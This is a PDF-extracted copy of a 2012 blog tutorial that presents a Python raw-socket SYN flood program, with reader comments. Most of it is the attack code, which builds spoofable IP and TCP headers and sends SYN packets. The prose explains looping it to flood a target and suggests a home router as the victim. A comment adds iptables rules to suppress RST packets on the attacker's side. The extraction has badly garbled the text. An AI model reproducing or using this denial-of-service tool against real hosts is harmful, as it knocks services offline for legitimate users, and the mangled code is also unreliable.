8/23/13

Syn flood program in python using raw sockets (Linux)

CODING GENERAL HACKING LINUX SOCKET PROGRAMMING

BinaryTides

Syn flood program in python using raw sockets (Linux)

Python By Silver Moon On Oct 2, 2012 3 Comments
Like 2 0 Tw eet 0

Syn flood and raw sockets

A syn flood program sends out large number of tcp syn packets to a remote host on a particular port number. Syn packets are intended to initiate a tcp connection. However if a large number of syn packets are send without any purpose, then then it would consume a lot of resources like memory on the remote system. This concept is used in denial of service (dos) attacks. It is like jamming the networking path of a remote machine or device. This results in the device being unable to serve actual requests from legitimate users. In this article we are going to write a very simple syn flood program in python. A syn flood program works by creating syn packets which need raw socket support. Linux has raw socket support natively and hence the program shown in this example shall work only on a linux system even though python itself is platform independant. This is because the underlying socket libraries are different on windows and linux. Enter email
RELATED POSTS

SEARCH

Subscribe

Code a simple socket server in Python Python socket chat server and client with code example

Code
The theory behind the code is quite simple. Just create a raw socket and a tcp syn packet and send the packet over the raw socket. That is all that needs to be done. Here is the program
1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8 2 9 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8 3 9 4 0 4 1 4 2 4 3 4 4 4 5 ' ' '

Code a simple telnet client using sockets in python Python program to fetch domain whois data using sockets Programming udp sockets in python Raw socket programming in python (Linux)

S y nf l o o dp r o g r a mi np y t h o nu s i n gr a ws o c k e t s( L i n u x ) S i l v e rM o o n( m 0 0 n . s i l v 3 r @ g m a i l . c o m )

Code a packet sniffer in python with pcapy extension Receive full data with the recv socket function in python Python socket network programming tutorial Code a network packet sniffer in python for Linux

' ' '

#s o m ei m p o r t s i m p o r ts o c k e t ,s y s f r o ms t r u c ti m p o r t* #c h e c k s u mf u n c t i o n sn e e d e df o rc a l c u l a t i o nc h e c k s u m d e fc h e c k s u m ( m s g ) : s= 0 #l o o pt a k i n g2c h a r a c t e r sa tat i m e f o r ii nr a n g e ( 0 ,l e n ( m s g ) ,2 ) : w= ( o r d ( m s g [ i ] )< <8 )+ ( o r d ( m s g [ i + 1 ] )) s= s+ w s= ( s > > 1 6 )+ ( s&0 x f f f f ) ; # s=s+( s> >1 6 ) ; # c o m p l e m e n ta n dm a s kt o4b y t es h o r t s= ~ s&0 x f f f f r e t u r ns # c r e a t ear a ws o c k e t t r y : s= s o c k e t . s o c k e t ( s o c k e t . A F _ I N E T ,s o c k e t . S O C K _ R A W ,s o c k e t . I P P R O T O _ T C P ) e x c e p ts o c k e t . e r r o r,m s g : p r i n t' S o c k e tc o u l dn o tb ec r e a t e d .E r r o rC o d e:'+ s t r ( m s g [ 0 ] )+ 'M e s s a g e'+ m s g [ 1 ] s y s . e x i t ( ) #t e l lk e r n e ln o tt op u ti nh e a d e r s ,s i n c ew ea r ep r o v i d i n gi t s . s e t s o c k o p t ( s o c k e t . I P P R O T O _ I P ,s o c k e t . I P _ H D R I N C L ,1 ) #n o ws t a r tc o n s t r u c t i n gt h ep a c k e t p a c k e t= ' ' ; s o u r c e _ i p= ' 1 9 2 . 1 6 8 . 1 . 1 0 1 ' d e s t _ i p= ' 1 9 2 . 1 6 8 . 1 . 1 '#o rs o c k e t . g e t h o s t b y n a m e ( ' w w w . g o o g l e . c o m ' ) #i ph e a d e rf i e l d s i h l= 5 v e r s i o n= 4 t o s= 0

Binary Tides
Like 3,515 people like Binary Tides.

BinaryTides
Follow
+ 70

+1

www.binarytides.com/python-syn-flood-program-raw-sockets-linux/

1/4

8/23/13

4 5 4 6 4 7 4 8 4 9 5 0 5 1 5 2 5 3 5 4 5 5 5 6 5 7 5 8 5 9 6 0 6 1 6 2 6 3 6 4 6 5 6 6 6 7 6 8 6 9 7 0 7 1 7 2 7 3 7 4 7 5 7 6 7 7 7 8 7 9 8 0 8 1 8 2 8 3 8 4 8 5 8 6 8 7 8 8 8 9 9 0 9 1 9 2 9 3 9 4 9 5 9 6 9 7 9 8 9 9 1 0 0 1 0 1 1 0 2 1 0 3 1 0 4

t o s= 0 t o t _ l e n= 2 0+ 2 0 #p y t h o ns e e m st oc o r r e c t l yf i l lt h et o t a ll e n g t h ,d o n tk n o wh o w? ? i d= 5 4 3 2 1 # I do ft h i sp a c k e t f r a g _ o f f= 0 t t l= 2 5 5 p r o t o c o l= s o c k e t . I P P R O T O _ T C P c h e c k= 1 0 #p y t h o ns e e m st oc o r r e c t l yf i l lt h ec h e c k s u m s a d d r= s o c k e t . i n e t _ a t o n(s o u r c e _ i p) # S p o o ft h es o u r c ei pa d d r e s si fy o uw a n tt o d a d d r= s o c k e t . i n e t _ a t o n(d e s t _ i p) i h l _ v e r s i o n= ( v e r s i o n< <4 )+ i h l #t h e!i nt h ep a c kf o r m a ts t r i n gm e a n sn e t w o r ko r d e r i p _ h e a d e r= p a c k ( ' ! B B H H H B B H 4 s 4 s ',i h l _ v e r s i o n ,t o s ,t o t _ l e n ,i d ,f r a g _ o f f ,t t l ,p r o t o c o l ,c h e c k ,s a d d r ,d a d d r ) #t c ph e a d e rf i e l d s s o u r c e= 1 2 3 4 #s o u r c ep o r t d e s t= 8 0 #d e s t i n a t i o np o r t s e q= 0 a c k _ s e q= 0 d o f f= 5 # 4b i tf i e l d ,s i z eo ft c ph e a d e r ,5*4=2 0b y t e s # t c pf l a g s f i n= 0 s y n= 1 r s t= 0 p s h= 0 a c k= 0 u r g= 0 w i n d o w= s o c k e t . h t o n s( 5 8 4 0 ) c h e c k= 0 u r g _ p t r= 0

Syn flood program in python using raw sockets (Linux)

m a x i m u ma l l o w e dw i n d o ws i z e

o f f s e t _ r e s= ( d o f f< <4 )+ 0 t c p _ f l a g s= f i n+ ( s y n< <1 )+ ( r s t< <2 )+ ( p s h< < 3 )+ ( a c k< <4 )+ ( u r g< <5 ) #t h e!i nt h ep a c kf o r m a ts t r i n gm e a n sn e t w o r ko r d e r t c p _ h e a d e r= p a c k ( ' ! H H L L B B H H H ',s o u r c e ,d e s t ,s e q ,a c k _ s e q ,o f f s e t _ r e s ,t c p _ f l a g s , w i n d o w ,c h e c k ,u r g _ p t r ) #p s e u d oh e a d e rf i e l d s s o u r c e _ a d d r e s s= s o c k e t . i n e t _ a t o n (s o u r c e _ i p) d e s t _ a d d r e s s= s o c k e t . i n e t _ a t o n ( d e s t _ i p ) p l a c e h o l d e r= 0 p r o t o c o l= s o c k e t . I P P R O T O _ T C P t c p _ l e n g t h= l e n ( t c p _ h e a d e r ) p s h= p a c k ( ' ! 4 s 4 s B B H ',s o u r c e _ a d d r e s s,d e s t _ a d d r e s s,p l a c e h o l d e r,p r o t o c o l,t c p _ l e n g t h ) ; p s h= p s h+ t c p _ h e a d e r ; t c p _ c h e c k s u m= c h e c k s u m ( p s h ) #m a k et h et c ph e a d e ra g a i na n df i l lt h ec o r r e c tc h e c k s u m t c p _ h e a d e r= p a c k ( ' ! H H L L B B H H H ',s o u r c e ,d e s t ,s e q ,a c k _ s e q ,o f f s e t _ r e s ,t c p _ f l a g s , w i n d o w ,t c p _ c h e c k s u m,u r g _ p t r ) #f i n a lf u l lp a c k e t-s y np a c k e t sd o n th a v ea n yd a t a p a c k e t= i p _ h e a d e r+ t c p _ h e a d e r # S e n dt h ep a c k e tf i n a l l y-t h ep o r ts p e c i f i e dh a sn oe f f e c t s . s e n d t o ( p a c k e t ,( d e s t _ i p,0) ) #p u tt h i si nal o o pi fy o uw a n tt of l o o dt h et a r g e t # p u tt h ea b o v el i n ei nal o o pl i k ew h i l e1 :i fy o uw a n tt of l o o d

The above program has to be run with root privileges. Raw sockets need root privileges. On ubuntu prefix sudo when running the script.
$s u d op y t h o nt c p _ s y n . p y

Also note that if a firewall like firestarter is running then it might block the syn packets from being delivered. Use a packet sniffer like wireshark to check that the packet was generated and transmitted properly. Many more things can be added to the above program. Put the sendto in a loop and it would send out huge number of syn packets, flooding the target system. Also try to change the source ip and source port in each packet in a loop. For this the pseudo header and tcp header checksum needs to be recalculated everytime. The best thing to try this program on would be your LAN router. If might get disconnected or even restart itself if it is unable to handle a syn flood attack.
Last Updated On : 30th November 2012 python python sockets socket programming syn flood

www.binarytides.com/python-syn-flood-program-raw-sockets-linux/

2/4

8/23/13

Syn flood program in python using raw sockets (Linux)

Related Posts
Syn flood program in perl using raw sockets (Linux) Raw socket programming in python (Linux) Python program to fetch domain whois data using sockets SYN Flood DOS Attack with C Source Code (Linux) Code a network packet sniffer in python for Linux About Silver Moon
Php developer, blogger and Linux enthusiast. He can be reached at m00n.silv3r@gmail.com. Or find him on Google+

3 comments Leave a message...

Best Community foreverz eus
4 months ago

Share

hi when I use this to connect a socket server in other pc in linux pc when I send a syn packet then the server send me a syn+ack packetBut, at the same time, linuc pc send the server a rst packet, but this packet is not sent by my program why I change my port but it nothing

Reply

Share
Mod

S ilver Moon

> foreverzeus

4 months ago

the syn packet is send by the program, but the syn+ack packet is received by the kernel. now the kernel is unaware of any syn packets send, since it did not send the syn packet. in such a case it finds the syn+ack packet unexpected and so replies with a rst server to tell the remote server that this is not a valid connection and should be closed down. this is the default behaviour on both windows and linux. and there is no easy way to prevent the kernel from sending the rst packets.
Reply Share

c raz y 4linux

> Silver Moon

a month ago

if attackers platform is linux then we can configure kernel to drop all outgoing rst flag packets by following rules :iptables A OUTPUT p tcp s 192.168.56.101 --tcp-flags RST RST j DROP iptables A OUTPUT p tcp s 192.168.56.103 --tcp-flags RST RST j DROP for further reference follow this link:-

r
C o m m e n t fe e d

http://www.linuxforu.com/2011/...
Reply Share

Su b s cri b e vi a e m a i l

www.binarytides.com/python-syn-flood-program-raw-sockets-linux/

3/4

8/23/13

Syn flood program in python using raw sockets (Linux)

About
Copyright Binarytides 2007-2011 |

www.binarytides.com/python-syn-flood-program-raw-sockets-linux/

4/4